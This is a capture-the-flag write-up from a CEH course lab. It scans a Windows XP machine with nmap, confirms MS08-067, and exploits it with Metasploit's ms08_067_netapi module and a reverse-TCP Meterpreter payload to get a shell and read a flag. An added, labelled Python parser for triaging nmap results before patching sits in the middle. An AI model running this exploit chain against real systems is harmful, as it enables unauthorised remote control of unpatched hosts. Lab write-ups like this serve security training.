Another machine available during the CEH course, but this one was pretty straightforward.

Maq103 – MACHINE
Description: This is what you get for running an outdated operating system with no vendor support.

The description of this machine tells us the OS is no longer up to date and vendor support is over, so let's look for active services:

[email protected]:~# nmap -sV -O
Nmap scan report for
Host is up (0.015s latency).
Not shown: 996 closed ports
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Good, SMB is active and, being one of the primary attack vectors, it is where we'll put our efforts. nmap used to have a script that checked several vulnerabilities at once, smb-check-vulns, but it was split into six scripts, so we'll need to run them separately.

Looking for the nmap SMB scripts:

[email protected]:~# locate *.nse | grep smb

After a few tries I found one with a chance of working.

[email protected]:~# nmap -sV -O --script smb-vuln-ms08-067.nse
Host script results:
| smb-vuln-ms08-067:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
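From a defender's side, output like this is a patch list: every host that exposes 445/tcp and has an smb-vuln script reporting VULNERABLE needs the vendor fix or decommissioning. The parser below is an added example (not part of the original post or of nmap); the scan text and the 192.0.2.10 address are constructed, modelled on the report format shown above.

```python
import re

# Constructed sample in nmap's normal-output format; 192.0.2.10 is a placeholder.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
Host is up (0.015s latency).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_    Disclosure date: 2008-10-23
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+")
SCRIPT_RE = re.compile(r"^\|\s*(smb-vuln-[\w-]+):")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

def parse_scan(text):
    """One dict per host: open ports plus each smb-vuln script's state and CVE ids."""
    hosts, cur, script = [], None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            cur = {"host": m.group(1), "open_ports": [], "vulns": {}}
            hosts.append(cur)
        elif cur is None:
            continue
        elif m := PORT_RE.match(line):
            cur["open_ports"].append(int(m.group(1)))
        elif m := SCRIPT_RE.match(line):
            script = m.group(1)
            cur["vulns"][script] = {"state": None, "cves": []}
        elif script and line.startswith("|"):
            body = line.lstrip("|_ ")          # strip the NSE tree prefix
            if body.startswith("State:"):
                cur["vulns"][script]["state"] = body.split(":", 1)[1].strip()
            cur["vulns"][script]["cves"].extend(CVE_RE.findall(body))
    return hosts

def needs_patching(h):
    """True when SMB is reachable and any script confirmed a vulnerable state."""
    return 445 in h["open_ports"] and any(
        v["state"] == "VULNERABLE" for v in h["vulns"].values())

def triage(text):
    """(host, sorted CVE ids) for every host that needs patching."""
    return [(h["host"], sorted({c for v in h["vulns"].values() for c in v["cves"]}))
            for h in parse_scan(text) if needs_patching(h)]
```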

We are going to use Metasploit for this one:

[email protected]:~# service postgresql start
[email protected]:~# msfconsole

Now we'll search for the exploit module, set the desired payload and set the module's options:

msf > search MS08-067
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set RHOST
msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(windows/smb/ms08_067_netapi) > set LHOST

It’s time to seat the finger (?! – senta o dedo)

msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] - We could not detect the language pack, defaulting to English
[*] - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 2 opened ( -> at 2018-03-27 09:54:59 -0300
meterpreter > shell
Process 876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>type c:\flag.txt

As soon as the session was open we invoked a shell and read the flag, which we already knew where to find. The machine is wide open, letting us do anything we want. We're done here.